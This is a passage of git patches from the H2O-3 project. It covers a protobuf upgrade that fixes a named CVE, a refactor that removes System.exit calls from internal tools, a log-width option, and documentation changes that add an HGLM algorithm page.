"org.apache.hadoop.thirdparty", module: "hadoop-shaded-protobuf_3_7" } // Upgrade dependencies of h2o-jetty-9 @@ -52,7 +53,7 @@ dependencies { // Upgrade dependencies coming from Hadoop to address vulnerabilities api "org.apache.commons:commons-compress:1.26.0" - api "com.google.protobuf:protobuf-java:3.21.7" + api "com.google.protobuf:protobuf-java:3.25.5" constraints { api('com.fasterxml.jackson.core:jackson-databind:2.17.2') { diff --git a/h2o-persist-gcs/build.gradle b/h2o-persist-gcs/build.gradle index 5d1ba374ad2b..507ef11e51bf 100644 --- a/h2o-persist-gcs/build.gradle +++ b/h2o-persist-gcs/build.gradle @@ -4,7 +4,7 @@ description = "H2O Persist GCS" dependencies { api project(":h2o-core") - api 'com.google.cloud:google-cloud-storage:2.13.1' + api ('com.google.cloud:google-cloud-storage:2.43.2') testImplementation project(":h2o-test-support") testRuntimeOnly project(":${defaultWebserverModule}") From d0899f8e0f7a584b60405a65b1d7b439aaaa55a5 Mon Sep 17 00:00:00 2001 From: krasinski <8573352+krasinski@users.noreply.github.com> Date: Wed, 23 Oct 2024 17:36:04 +0200 Subject: [PATCH 06/12] [GH-16351] Do not call System.exit from water.tools [nocheck] (#16366) * [GH-16351] Do not call System.exit from water.tools * add mainInternal to EncryptionTool * make the err msg short * make the err msg short - part 2 * improve error handling --- .../java/water/tools/MojoConvertTool.java | 25 +++++++++++-------- .../rapids/ast/prims/internal/AstRunTool.java | 6 +++-- .../main/java/water/tools/EncryptionTool.java | 3 +++ .../water/tools/XGBoostLibExtractTool.java | 18 ++++++++----- 4 files changed, 33 insertions(+), 19 deletions(-) diff --git a/h2o-algos/src/main/java/water/tools/MojoConvertTool.java b/h2o-algos/src/main/java/water/tools/MojoConvertTool.java index 9abd23123068..eed6537dc743 100644 --- a/h2o-algos/src/main/java/water/tools/MojoConvertTool.java +++ b/h2o-algos/src/main/java/water/tools/MojoConvertTool.java @@ -33,25 +33,28 @@ void convert() throws IOException { Files.write(pojoPath, pojo.getBytes(StandardCharsets.UTF_8)); } - private static void usage() { - System.err.println("java -cp h2o.jar " + MojoConvertTool.class.getName() + " source_mojo.zip target_pojo.java"); - } - public static void main(String[] args) throws IOException { - if (args.length < 2) { - usage(); + try { + mainInternal(args); + } + catch (IllegalArgumentException e) { + System.err.println(e.getMessage()); System.exit(1); } + } + + public static void mainInternal(String[] args) throws IOException { + if (args.length < 2 || args[0] == null || args[1] == null) { + throw new IllegalArgumentException("java -cp h2o.jar " + MojoConvertTool.class.getName() + " source_mojo.zip target_pojo.java"); + } File mojoFile = new File(args[0]); - if (!mojoFile.isFile()) { - System.err.println("Specified MOJO file (" + mojoFile.getAbsolutePath() + ") doesn't exist!"); - System.exit(2); + if (!mojoFile.exists() || !mojoFile.isFile()) { + throw new IllegalArgumentException("Specified MOJO file (" + mojoFile.getAbsolutePath() + ") doesn't exist!"); } File pojoFile = new File(args[1]); if (pojoFile.isDirectory() || (pojoFile.getParentFile() != null && !pojoFile.getParentFile().isDirectory())) { - System.err.println("Invalid target POJO file (" + pojoFile.getAbsolutePath() + ")! Please specify a file in an existing directory."); - System.exit(3); + throw new IllegalArgumentException("Invalid target POJO file (" + pojoFile.getAbsolutePath() + ")! Please specify a file in an existing directory."); } System.out.println(); diff --git a/h2o-core/src/main/java/water/rapids/ast/prims/internal/AstRunTool.java b/h2o-core/src/main/java/water/rapids/ast/prims/internal/AstRunTool.java index 3fe4bf179866..533e9ce7f26d 100644 --- a/h2o-core/src/main/java/water/rapids/ast/prims/internal/AstRunTool.java +++ b/h2o-core/src/main/java/water/rapids/ast/prims/internal/AstRunTool.java @@ -33,10 +33,12 @@ public ValStr apply(Env env, Env.StackHelp stk, AstRoot[] asts) { try { // only allow to run approved tools (from our package), not just anything on classpath Class clazz = Class.forName(TOOLS_PACKAGE + toolClassName); - Method mainMethod = clazz.getDeclaredMethod("main", String[].class); + Method mainMethod = clazz.getDeclaredMethod("mainInternal", String[].class); mainMethod.invoke(null, new Object[]{args}); } catch (Exception e) { - throw new RuntimeException(e); + RuntimeException shorterException = new RuntimeException(e.getCause().getMessage()); + shorterException.setStackTrace(new StackTraceElement[0]); + throw shorterException; } return new ValStr("OK"); } diff --git a/h2o-core/src/main/java/water/tools/EncryptionTool.java b/h2o-core/src/main/java/water/tools/EncryptionTool.java index e3faabf7d12e..73f12f0c9a96 100644 --- a/h2o-core/src/main/java/water/tools/EncryptionTool.java +++ b/h2o-core/src/main/java/water/tools/EncryptionTool.java @@ -47,6 +47,9 @@ public void encrypt(File input, File output) throws IOException, GeneralSecurity } public static void main(String[] args) throws GeneralSecurityException, IOException { + mainInternal(args); + } + public static void mainInternal(String[] args) throws GeneralSecurityException, IOException { EncryptionTool et = new EncryptionTool(); et._keystore_file = new File(args[0]); et._keystore_type = args[1]; diff --git a/h2o-extensions/xgboost/src/main/java/water/tools/XGBoostLibExtractTool.java b/h2o-extensions/xgboost/src/main/java/water/tools/XGBoostLibExtractTool.java index dc94b1835e01..267fd281bee9 100644 --- a/h2o-extensions/xgboost/src/main/java/water/tools/XGBoostLibExtractTool.java +++ b/h2o-extensions/xgboost/src/main/java/water/tools/XGBoostLibExtractTool.java @@ -10,19 +10,25 @@ public class XGBoostLibExtractTool { public static void main(String[] args) throws IOException { + try { + mainInternal(args); + } catch (IllegalArgumentException e) { + System.err.println((e.getMessage())); + System.exit(1); + } + } + + public static void mainInternal(String[] args) throws IOException { if (args.length != 1) { - System.err.println("XGBoostLibExtractTool: Specify target directory where to extract XGBoost native libraries."); - System.exit(-1); + throw new IllegalArgumentException("XGBoostLibExtractTool: Specify target directory where to extract XGBoost native libraries."); } File dir = new File(args[0]); if (!dir.exists()) { - System.err.println("XGBoostLibExtractTool: Directory '" + dir.getAbsolutePath() + "' doesn't exist."); - System.exit(-1); + throw new IllegalArgumentException("XGBoostLibExtractTool: Directory '" + dir.getAbsolutePath() + "' doesn't exist."); } NativeLibraryLoaderChain loader = XGBoostExtension.getLoader(); if (loader == null) { - System.err.println("XGBoostLibExtractTool: Failed to locate native libraries."); - System.exit(-1); + throw new IllegalArgumentException("XGBoostLibExtractTool: Failed to locate native libraries."); } for (NativeLibrary lib : loader.getNativeLibs()) { if (!lib.isBundled()) From 3e4c39dfacc5f0e7bc0240d3a9cbda845d86c535 Mon Sep 17 00:00:00 2001 From: Adam Valenta Date: Thu, 24 Oct 2024 15:09:44 +0200 Subject: [PATCH 07/12] GH-16423 - fix hadoop jars after gcs upgrade [nocheck] (#16428) * downgrade google gcs * upgrade only protobuf --- h2o-persist-gcs/build.gradle | 10 +++++++++- 1 file changed, 9 insertions(+), 1 deletion(-) diff --git a/h2o-persist-gcs/build.gradle b/h2o-persist-gcs/build.gradle index 507ef11e51bf..d07448510c39 100644 --- a/h2o-persist-gcs/build.gradle +++ b/h2o-persist-gcs/build.gradle @@ -4,10 +4,18 @@ description = "H2O Persist GCS" dependencies { api project(":h2o-core") - api ('com.google.cloud:google-cloud-storage:2.43.2') + api ('com.google.cloud:google-cloud-storage:2.13.1') testImplementation project(":h2o-test-support") testRuntimeOnly project(":${defaultWebserverModule}") + + constraints { + api('com.google.protobuf:protobuf-java:3.25.5') { + because 'Fixes CVE-2024-7254' + because 'Fixes SNYK-JAVA-COMGOOGLEPROTOBUF-8055227' + because 'Fixes SNYK-JAVA-COMGOOGLEPROTOBUF-8055228' + } + } } apply from: "${rootDir}/gradle/dataCheck.gradle" From 50aa9e06fbcd4bdec2a28c5373e964954994b6e7 Mon Sep 17 00:00:00 2001 From: Adam Valenta Date: Thu, 24 Oct 2024 16:45:36 +0200 Subject: [PATCH 08/12] GH-16423 - do not remove hadoop-shaded-protobuf_3_7 because of the failed tests (#16436) --- h2o-assemblies/main/build.gradle | 1 - 1 file changed, 1 deletion(-) diff --git a/h2o-assemblies/main/build.gradle b/h2o-assemblies/main/build.gradle index 25bc231de6a4..17b240dc7418 100644 --- a/h2o-assemblies/main/build.gradle +++ b/h2o-assemblies/main/build.gradle @@ -33,7 +33,6 @@ dependencies { exclude group: "org.apache.curator" exclude group: "org.apache.zookeeper" exclude group: "org.eclipse.jetty" - exclude group: "org.apache.hadoop.thirdparty", module: "hadoop-shaded-protobuf_3_7" } // Upgrade dependencies of h2o-jetty-9 From 966a1f213f77749c6b2cd2a81144811c22621135 Mon Sep 17 00:00:00 2001 From: Hannah <52463461+hannah-tillman@users.noreply.github.com> Date: Thu, 24 Oct 2024 11:42:21 -0500 Subject: [PATCH 09/12] ht/numpy requirements (#16434) --- h2o-docs/src/product/welcome.rst | 5 +++++ 1 file changed, 5 insertions(+) diff --git a/h2o-docs/src/product/welcome.rst b/h2o-docs/src/product/welcome.rst index 391b0cdbb6bf..2ac9f5221f73 100644 --- a/h2o-docs/src/product/welcome.rst +++ b/h2o-docs/src/product/welcome.rst @@ -29,6 +29,11 @@ At a minimum, we recommend the following for compatibility with H2O: - Python 3.6.x, 3.7.x, 3.8.x, 3.9.x, 3.10.x, 3.11.x - **Browser**: An internet browser is required to use H2O's web UI, Flow. Supported versions include the latest version of Chrome, Firefox, Safari, or Internet Explorer. +- **numpy**: H2O-3 only supports ``numpy<2``. To work around having ``numpy2`` installed, run the following command: + + :: + + pip install --force-reinstall 'numpy<2' Java Requirements ~~~~~~~~~~~~~~~~~ From 6aa97cca00b0e37a6b449993eea7cf0e474b57bf Mon Sep 17 00:00:00 2001 From: krasinski <8573352+krasinski@users.noreply.github.com> Date: Fri, 25 Oct 2024 00:32:05 +0200 Subject: [PATCH 10/12] GH-16361 allow longer pids by adding sys.ai.h2o.log.max.pid.length [nocheck] (#16390) * GH-16361 allow longer pids by adding sys.ai.h2o.log.max.pid.length * add comment about sys.ai.h2o.log.max.pid.length --- h2o-core/src/main/java/water/util/Log.java | 12 ++++++++++-- 1 file changed, 10 insertions(+), 2 deletions(-) diff --git a/h2o-core/src/main/java/water/util/Log.java b/h2o-core/src/main/java/water/util/Log.java index dc1658f2ec8f..72f8ebf354ba 100644 --- a/h2o-core/src/main/java/water/util/Log.java +++ b/h2o-core/src/main/java/water/util/Log.java @@ -29,8 +29,8 @@ abstract public class Log { public static final byte INFO = 3; public static final byte DEBUG= 4; public static final byte TRACE= 5; - public static final String[] LVLS = { "FATAL", "ERRR", "WARN", "INFO", "DEBUG", "TRACE" }; + private static final String PROP_MAX_PID_LENGTH = H2O.OptArgs.SYSTEM_PROP_PREFIX + "log.max.pid.length"; private static int _level = INFO; private static boolean _quiet = false; @@ -262,7 +262,15 @@ public static String getLogFilePath(String level) { private static String getHostPortPid() { String host = H2O.SELF_ADDRESS.getHostAddress(); - return fixedLength(host + ":" + H2O.API_PORT + " ", 22) + fixedLength(H2O.PID + " ", 6); + return fixedLength(host + ":" + H2O.API_PORT + " ", 22) + fixedLength(H2O.PID + " ", maximumPidLength() + 2); + } + + // set sys.ai.h2o.log.max.pid.length to avoid h2o-3 trimming PID in the logs + private static int maximumPidLength() { + String maxPidPropertyValue = System.getProperty(PROP_MAX_PID_LENGTH); + return maxPidPropertyValue != null + ? Integer.parseInt(maxPidPropertyValue) + : 4; } private static synchronized Logger createLog4j() { From dc7bfa726edfad1436ab8a855ec77ba6067cd083 Mon Sep 17 00:00:00 2001 From: Hannah <52463461+hannah-tillman@users.noreply.github.com> Date: Fri, 25 Oct 2024 21:38:41 -0500 Subject: [PATCH 11/12] GH-16413: Adding HGLM solo algorithm page [nocheck] (#16419) * ht/initial hglm * ht/added descriptions, ordered, values * ht/references * ht/pulled old intro; defining hlm to own section * ht/thru pg2 * ht/first thru HLM section * ht/next section * ht/added to available algo-params * ht/next section draft * ht/equation fixes * ht/next section * ht/weekend pause * ht/draft log-likelihood * ht/alternate log-likelihood & updated refs * ht/pulling hglm from algo-params & glm page * ht/end piece - example stand-in - glm family image add-in for shared algo-params * ht/requested updates * ht/removed intro * ht/requested updates * ht/added r examples * ht/requested changes rd.2 * ht/requetsed changed rd.3 --- h2o-docs/src/product/data-science.rst | 1 + .../algo-params/custom_metric_func.rst | 2 +- .../data-science/algo-params/family.rst | 2 +- .../product/data-science/algo-params/hglm.rst | 81 ---- .../algo-params/ignore_const_cols.rst | 2 +- .../algo-params/ignored_columns.rst | 2 +- .../algo-params/max_iterations.rst | 2 +- .../algo-params/max_runtime_secs.rst | 2 +- .../algo-params/missing_values_handling.rst | 2 +- .../data-science/algo-params/model_id.rst | 2 +- .../algo-params/offset_column.rst | 2 +- .../data-science/algo-params/plug_values.rst | 2 +- .../data-science/algo-params/rand_family.rst | 2 +- .../algo-params/random_columns.rst | 4 +- .../algo-params/score_each_iteration.rst | 2 +- .../product/data-science/algo-params/seed.rst | 2 +- .../data-science/algo-params/standardize.rst | 2 +- .../algo-params/training_frame.rst | 2 +- .../algo-params/validation_frame.rst | 2 +- .../algo-params/weights_column.rst | 2 +- .../product/data-science/algo-params/x.rst | 2 +- .../product/data-science/algo-params/y.rst | 2 +- h2o-docs/src/product/data-science/glm.rst | 266 +----------- h2o-docs/src/product/data-science/hglm.rst | 392 ++++++++++++++++++ h2o-docs/src/product/images/HGLM.png | Bin 0 -> 9054 bytes h2o-docs/src/product/parameters.rst | 1 - 26 files changed, 423 insertions(+), 360 deletions(-) delete mode 100644 h2o-docs/src/product/data-science/algo-params/hglm.rst create mode 100644 h2o-docs/src/product/data-science/hglm.rst create mode 100644 h2o-docs/src/product/images/HGLM.png diff --git a/h2o-docs/src/product/data-science.rst b/h2o-docs/src/product/data-science.rst index bf6fef75163f..b7b16ff0403e 100644 --- a/h2o-docs/src/product/data-science.rst +++ b/h2o-docs/src/product/data-science.rst @@ -42,6 +42,7 @@ H2O-3 supports the following supervised algorithms: data-science/model_selection data-science/gam data-science/anova_glm + data-science/hglm data-science/gbm data-science/naive-bayes data-science/rulefit diff --git a/h2o-docs/src/product/data-science/algo-params/custom_metric_func.rst b/h2o-docs/src/product/data-science/algo-params/custom_metric_func.rst index f58bf37805ce..2895d9d27a8d 100644 --- a/h2o-docs/src/product/data-science/algo-params/custom_metric_func.rst +++ b/h2o-docs/src/product/data-science/algo-params/custom_metric_func.rst @@ -3,7 +3,7 @@ ``custom_metric_func`` ---------------------- -- Available in: GBM, GLM, DRF, Deeplearning, Stacked Ensembles, XGBoost +- Available in: GBM, GLM, HGLM, DRF, Deeplearning, Stacked Ensembles, XGBoost - Hyperparameter: no Description diff --git a/h2o-docs/src/product/data-science/algo-params/family.rst b/h2o-docs/src/product/data-science/algo-params/family.rst index 29a5b28c60ba..91e6572f52a5 100644 --- a/h2o-docs/src/product/data-science/algo-params/family.rst +++ b/h2o-docs/src/product/data-science/algo-params/family.rst @@ -1,7 +1,7 @@ ``family`` ---------- -- Available in: GLM, GAM +- Available in: GLM, GAM, HGLM - Hyperparameter: no Description diff --git a/h2o-docs/src/product/data-science/algo-params/hglm.rst b/h2o-docs/src/product/data-science/algo-params/hglm.rst deleted file mode 100644 index 24cbf686b56e..000000000000 --- a/h2o-docs/src/product/data-science/algo-params/hglm.rst +++ /dev/null @@ -1,81 +0,0 @@ -``HGLM`` --------- - -- Available in: GLM -- Hyperparameter: no - -Description -~~~~~~~~~~~ - -Generalized Linear Models (GLM) estimate regression models for outcomes following exponential distributions. Hierarchical GLM (HGLM) fits generalized linear models with random effects, where the random effect can come from a conjugate exponential-family distribution (for example, Gaussian). HGLM allows you to specify both fixed and random effects, which allows fitting correlated to random effects as well as random regression models. - -HGLM produces estimates for fixed effects, random effects, variance components and their standard errors. It also produces diagnostics, such as variances and leverages. - -The ``HGLM`` option allows you to build a hierarchical generalized linear model. This option is disabled by default. - -**Note**: This initial release of HGLM supports only Gaussian for ``family`` and ``rand_family``. - -Related Parameters -~~~~~~~~~~~~~~~~~~ - -- `random_columns `__ -- `rand_family `__ - -Example -~~~~~~~ - -.. tabs:: - .. code-tab:: r R - - library(h2o) - h2o.init() - - # Import the semiconductor dataset - h2odata <- h2o.importFile("https://s3.amazonaws.com/h2o-public-test-data/smalldata/glm_test/semiconductor.csv") - - # Set the response, predictor, and random columns - yresp <- "y" - xlist <- c("x1", "x3", "x5", "x6") - z <- c(1) - - # Convert the "Device" column to a factor - h2odata$Device <- h2o.asfactor(h2odata$Device) - - # Train and view the model - m11H2O <- h2o.glm(x = xlist, - y = yresp, - family = "gaussian", - rand_family = c("gaussian"), - rand_link = c("identity"), - training_frame = h2odata, - HGLM = TRUE, - random_columns = z, - calc_like = TRUE) - print(m11H2O) - - .. code-tab:: python - - import h2o - from h2o.estimators.glm import H2OGeneralizedLinearEstimator - h2o.init() - - # Import the semiconductor dataset - h2o_data = h2o.import_file("https://s3.amazonaws.com/h2o-public-test-data/smalldata/glm_test/semiconductor.csv") - - # Set the response, predictor, and random columns - y = "y" - x = ["x1","x3","x5","x6"] - z = 0 - - # Convert the "Device" column to a factor - h2o_data["Device"] = h2o_data["Device"].asfactor() - - # Train and view the model - h2o_glm = H2OGeneralizedLinearEstimator(HGLM=True, - family="gaussian", - rand_family=["gaussian"], - random_columns=[z], - rand_link=["identity"], - calc_like=True) - h2o_glm.train(x=x, y=y, training_frame=h2o_data) - print(h2o_glm) diff --git a/h2o-docs/src/product/data-science/algo-params/ignore_const_cols.rst b/h2o-docs/src/product/data-science/algo-params/ignore_const_cols.rst index bb1f3865a9a9..118ed290d864 100644 --- a/h2o-docs/src/product/data-science/algo-params/ignore_const_cols.rst +++ b/h2o-docs/src/product/data-science/algo-params/ignore_const_cols.rst @@ -1,7 +1,7 @@ ``ignore_const_cols`` --------------------- -- Available in: GBM, DRF, Deep Learning, GLM, GAM, PCA, GLRM, Naïve-Bayes, K-Means, XGBoost, Aggregator, Isolation Forest, Extended Isolation Forest, Uplift DRF, AdaBoost +- Available in: GBM, DRF, Deep Learning, GLM, GAM, HGLM, PCA, GLRM, Naïve-Bayes, K-Means, XGBoost, Aggregator, Isolation Forest, Extended Isolation Forest, Uplift DRF, AdaBoost, Decision Tree, ANOVAGLM, ModelSelection - Hyperparameter: no Description diff --git a/h2o-docs/src/product/data-science/algo-params/ignored_columns.rst b/h2o-docs/src/product/data-science/algo-params/ignored_columns.rst index 3bdd8ed63e64..7f2ac060544d 100644 --- a/h2o-docs/src/product/data-science/algo-params/ignored_columns.rst +++ b/h2o-docs/src/product/data-science/algo-params/ignored_columns.rst @@ -1,7 +1,7 @@ ``ignored_columns`` ------------------- -- Available in: GBM, DRF, Deep Learning, GLM, GAM, PCA, GLRM, Naïve-Bayes, K-Means, XGBoost, Aggregator, CoxPH, Isolation Forest, Extended Isolation Forest, Uplift DRF, AdaBoost +- Available in: GBM, DRF, Deep Learning, GLM, GAM, HGLM, PCA, GLRM, Naïve-Bayes, K-Means, XGBoost, Aggregator, CoxPH, Isolation Forest, Extended Isolation Forest, Uplift DRF, AdaBoost, Decision Tree, ANOVAGLM, ModelSelection - Hyperparameter: no Description diff --git a/h2o-docs/src/product/data-science/algo-params/max_iterations.rst b/h2o-docs/src/product/data-science/algo-params/max_iterations.rst index 1d15c6240ade..d791368f1798 100644 --- a/h2o-docs/src/product/data-science/algo-params/max_iterations.rst +++ b/h2o-docs/src/product/data-science/algo-params/max_iterations.rst @@ -1,7 +1,7 @@ ``max_iterations`` ------------------ -- Available in: GLM, GAM, PCA, GLRM, K-Means, CoxPH +- Available in: GLM, GAM, HGLM, PCA, GLRM, K-Means, CoxPH, ANOVAGLM, ModelSelection - Hyperparameter: yes Description diff --git a/h2o-docs/src/product/data-science/algo-params/max_runtime_secs.rst b/h2o-docs/src/product/data-science/algo-params/max_runtime_secs.rst index 40803a1e173e..0f7273c0a575 100644 --- a/h2o-docs/src/product/data-science/algo-params/max_runtime_secs.rst +++ b/h2o-docs/src/product/data-science/algo-params/max_runtime_secs.rst @@ -3,7 +3,7 @@ ``max_runtime_secs`` ----------------------- -- Available in: GBM, DRF, Deep Learning, GLM, PCA, GLRM, Naïve-Bayes, K-Means, AutoML, XGBoost, Word2vec, Isolation Forest, Stacked Ensembles, Uplift DRF +- Available in: GBM, DRF, Deep Learning, GLM, HGLM, PCA, GLRM, Naïve-Bayes, K-Means, AutoML, XGBoost, Word2vec, Isolation Forest, Stacked Ensembles, Uplift DRF, ANOVAGLM, ModelSelection - Hyperparameter: yes Description diff --git a/h2o-docs/src/product/data-science/algo-params/missing_values_handling.rst b/h2o-docs/src/product/data-science/algo-params/missing_values_handling.rst index 4785d6cad8a8..01cb03a8482a 100644 --- a/h2o-docs/src/product/data-science/algo-params/missing_values_handling.rst +++ b/h2o-docs/src/product/data-science/algo-params/missing_values_handling.rst @@ -1,7 +1,7 @@ ``missing_values_handling`` --------------------------- -- Available in: Deep Learning, GLM, GAM +- Available in: Deep Learning, GLM, GAM, HGLM, ANOVAGLM, ModelSelection - Hyperparameter: yes Description diff --git a/h2o-docs/src/product/data-science/algo-params/model_id.rst b/h2o-docs/src/product/data-science/algo-params/model_id.rst index 222a4188c5b9..f1074afe934a 100644 --- a/h2o-docs/src/product/data-science/algo-params/model_id.rst +++ b/h2o-docs/src/product/data-science/algo-params/model_id.rst @@ -1,7 +1,7 @@ ``model_id`` ------------ -- Available in: GBM, DRF, Deep Learning, GLM, GAM, PCA, GLRM, Naïve-Bayes, K-Means, Word2Vec, Stacked Ensembles, XGBoost, Aggregator, CoxPH, Isolation Forest, Extended Isolation Forest, Uplift DRF, AdaBoost +- Available in: GBM, DRF, Deep Learning, GLM, GAM, HGLM, PCA, GLRM, Naïve-Bayes, K-Means, Word2Vec, Stacked Ensembles, XGBoost, Aggregator, CoxPH, Isolation Forest, Extended Isolation Forest, Uplift DRF, AdaBoost, Decision Tree, ANOVAGLM, ModelSelection - Hyperparameter: no Description diff --git a/h2o-docs/src/product/data-science/algo-params/offset_column.rst b/h2o-docs/src/product/data-science/algo-params/offset_column.rst index 999c763a6694..a7b7bce8c91e 100644 --- a/h2o-docs/src/product/data-science/algo-params/offset_column.rst +++ b/h2o-docs/src/product/data-science/algo-params/offset_column.rst @@ -1,7 +1,7 @@ ``offset_column`` ----------------- -- Available in: GBM, Deep Learning, GLM, GAM, CoxPH, XGBoost, Stacked Ensembles +- Available in: GBM, Deep Learning, GLM, GAM, HGLM, CoxPH, XGBoost, Stacked Ensembles, ANOVAGLM, ModelSelection - Hyperparameter: no diff --git a/h2o-docs/src/product/data-science/algo-params/plug_values.rst b/h2o-docs/src/product/data-science/algo-params/plug_values.rst index 9c60330da220..051df8dc2044 100644 --- a/h2o-docs/src/product/data-science/algo-params/plug_values.rst +++ b/h2o-docs/src/product/data-science/algo-params/plug_values.rst @@ -1,7 +1,7 @@ ``plug_values`` --------------- -- Available in: GLM, GAM +- Available in: GLM, GAM, HGLM, ANOVAGLM, ModelSelection - Hyperparameter: yes Description diff --git a/h2o-docs/src/product/data-science/algo-params/rand_family.rst b/h2o-docs/src/product/data-science/algo-params/rand_family.rst index d02187b3ffa3..93039511d074 100644 --- a/h2o-docs/src/product/data-science/algo-params/rand_family.rst +++ b/h2o-docs/src/product/data-science/algo-params/rand_family.rst @@ -1,7 +1,7 @@ ``rand_family`` --------------- -- Available in: GLM +- Available in: HGLM - Hyperparameter: no Description diff --git a/h2o-docs/src/product/data-science/algo-params/random_columns.rst b/h2o-docs/src/product/data-science/algo-params/random_columns.rst index 7e7c53406ab5..ee2e621e114c 100644 --- a/h2o-docs/src/product/data-science/algo-params/random_columns.rst +++ b/h2o-docs/src/product/data-science/algo-params/random_columns.rst @@ -1,8 +1,8 @@ ``random_columns`` ------------------ -- Available in: GLM -- Hyperparameter: no +- Available in: HGLM +- Hyperparameter: yes Description ~~~~~~~~~~~ diff --git a/h2o-docs/src/product/data-science/algo-params/score_each_iteration.rst b/h2o-docs/src/product/data-science/algo-params/score_each_iteration.rst index 9a759131e6aa..5d2426a4a7ac 100644 --- a/h2o-docs/src/product/data-science/algo-params/score_each_iteration.rst +++ b/h2o-docs/src/product/data-science/algo-params/score_each_iteration.rst @@ -3,7 +3,7 @@ ``score_each_iteration`` ------------------------ -- Available in: GBM, DRF, Deep Learning, GLM, GAM, PCA, GLRM, Naïve-Bayes, K-Means, XGBoost, Isolation Forest, Extended Isolation Forest, Uplift DRF +- Available in: GBM, DRF, Deep Learning, GLM, GAM, HGLM, PCA, GLRM, Naïve-Bayes, K-Means, XGBoost, Isolation Forest, Extended Isolation Forest, Uplift DRF, ANOVAGLM, ModelSelection - Hyperparameter: no diff --git a/h2o-docs/src/product/data-science/algo-params/seed.rst b/h2o-docs/src/product/data-science/algo-params/seed.rst index 334db7479a1e..1e5c20ed6afc 100644 --- a/h2o-docs/src/product/data-science/algo-params/seed.rst +++ b/h2o-docs/src/product/data-science/algo-params/seed.rst @@ -1,7 +1,7 @@ ``seed`` -------- -- Available in: GBM, DRF, Deep Learning, GLM, GAM, PCA, GLRM, Naïve-Bayes, K-Means, AutoML, XGBoost, Stacked Ensembles, Isolation Forest, Target Encoding, Extended Isolation Forest, Uplift DRF, AdaBoost +- Available in: GBM, DRF, Deep Learning, GLM, GAM, HGLM, PCA, GLRM, Naïve-Bayes, K-Means, AutoML, XGBoost, Stacked Ensembles, Isolation Forest, Target Encoding, Extended Isolation Forest, Uplift DRF, AdaBoost, Decision Tree, ANOVAGLM, ModelSelection - Hyperparameter: yes Description diff --git a/h2o-docs/src/product/data-science/algo-params/standardize.rst b/h2o-docs/src/product/data-science/algo-params/standardize.rst index 946fbd60c8f7..27bf489429ab 100644 --- a/h2o-docs/src/product/data-science/algo-params/standardize.rst +++ b/h2o-docs/src/product/data-science/algo-params/standardize.rst @@ -1,7 +1,7 @@ ``standardize`` --------------- -- Available in: Deep Learning, GLM, GAM, K-Means +- Available in: Deep Learning, GLM, GAM, HGLM, K-Means, ANOVAGLM, ModelSelection - Hyperparameter: yes Description diff --git a/h2o-docs/src/product/data-science/algo-params/training_frame.rst b/h2o-docs/src/product/data-science/algo-params/training_frame.rst index 76d9dd4ad91b..aa75fc63e10f 100644 --- a/h2o-docs/src/product/data-science/algo-params/training_frame.rst +++ b/h2o-docs/src/product/data-science/algo-params/training_frame.rst @@ -1,7 +1,7 @@ ``training_frame`` ------------------ -- Available in: GBM, DRF, Deep Learning, GLM, GAM, PCA, GLRM, Naïve-Bayes, K-Means, Word2Vec, Stacked Ensembles, AutoML, XGBoost, Aggregator, CoxPH, Isolation Forest, Extended Isolation Forest, Uplift DRF, AdaBoost +- Available in: GBM, DRF, Deep Learning, GLM, GAM, HGLM, PCA, GLRM, Naïve-Bayes, K-Means, Word2Vec, Stacked Ensembles, AutoML, XGBoost, Aggregator, CoxPH, Isolation Forest, Extended Isolation Forest, Uplift DRF, AdaBoost, Decision Tree, ANOVAGLM, ModelSelection - Hyperparameter: no Description diff --git a/h2o-docs/src/product/data-science/algo-params/validation_frame.rst b/h2o-docs/src/product/data-science/algo-params/validation_frame.rst index 4725a02883be..66b9ce8a4a72 100644 --- a/h2o-docs/src/product/data-science/algo-params/validation_frame.rst +++ b/h2o-docs/src/product/data-science/algo-params/validation_frame.rst @@ -1,7 +1,7 @@ ``validation_frame`` -------------------- -- Available in: GBM, DRF, Deep Learning, GLM, GAM, PCA, GLRM, Naïve-Bayes, K-Means, Stacked Ensembles, AutoML, XGBoost, Uplift DRF +- Available in: GBM, DRF, Deep Learning, GLM, GAM, HGLM, PCA, GLRM, Naïve-Bayes, K-Means, Stacked Ensembles, AutoML, XGBoost, Uplift DRF, ModelSelection - Hyperparameter: no Description diff --git a/h2o-docs/src/product/data-science/algo-params/weights_column.rst b/h2o-docs/src/product/data-science/algo-params/weights_column.rst index 3ecbda1ca3b6..f1a64286915b 100644 --- a/h2o-docs/src/product/data-science/algo-params/weights_column.rst +++ b/h2o-docs/src/product/data-science/algo-params/weights_column.rst @@ -1,7 +1,7 @@ ``weights_column`` ------------------ -- Available in: GBM, DRF, Deep Learning, GLM, GAM, AutoML, XGBoost, CoxPH, Stacked Ensembles, AdaBoost +- Available in: GBM, DRF, Deep Learning, GLM, GAM, HGLM, AutoML, XGBoost, CoxPH, Stacked Ensembles, AdaBoost, ANOVAGLM, ModelSelection - Hyperparameter: no Description diff --git a/h2o-docs/src/product/data-science/algo-params/x.rst b/h2o-docs/src/product/data-science/algo-params/x.rst index 98e27e8a5bc9..06020ab907a0 100644 --- a/h2o-docs/src/product/data-science/algo-params/x.rst +++ b/h2o-docs/src/product/data-science/algo-params/x.rst @@ -1,7 +1,7 @@ ``x`` ----- -- Available in: GBM, DRF, Deep Learning, GLM, GAM, PCA, GLRM, Naïve-Bayes, K-Means, Stacked Ensembles, AutoML, XGBoost, Uplift DRF, AdaBoost +- Available in: GBM, DRF, Deep Learning, GLM, GAM, HGLM, PCA, GLRM, Naïve-Bayes, K-Means, Stacked Ensembles, AutoML, XGBoost, Uplift DRF, AdaBoost, Decision Tree, ANOVAGLM, ModelSelection - Hyperparameter: no Description diff --git a/h2o-docs/src/product/data-science/algo-params/y.rst b/h2o-docs/src/product/data-science/algo-params/y.rst index 82c7276707d1..46c1f07c9061 100644 --- a/h2o-docs/src/product/data-science/algo-params/y.rst +++ b/h2o-docs/src/product/data-science/algo-params/y.rst @@ -1,6 +1,6 @@ ``y`` ----- -- Available in: GBM, DRF, Deep Learning, GLM, GAM, Naïve-Bayes, Stacked Ensembles, AutoML, XGBoost, Aggregator, Uplift DRF, AdaBoost +- Available in: GBM, DRF, Deep Learning, GLM, GAM, HGLM, Naïve-Bayes, Stacked Ensembles, AutoML, XGBoost, Aggregator, Uplift DRF, AdaBoost, Decision Tree, ANOVAGLM, ModelSelection - Hyperparameter: no diff --git a/h2o-docs/src/product/data-science/glm.rst b/h2o-docs/src/product/data-science/glm.rst index 161d57698fdc..7c03cea4d520 100644 --- a/h2o-docs/src/product/data-science/glm.rst +++ b/h2o-docs/src/product/data-science/glm.rst @@ -71,18 +71,6 @@ 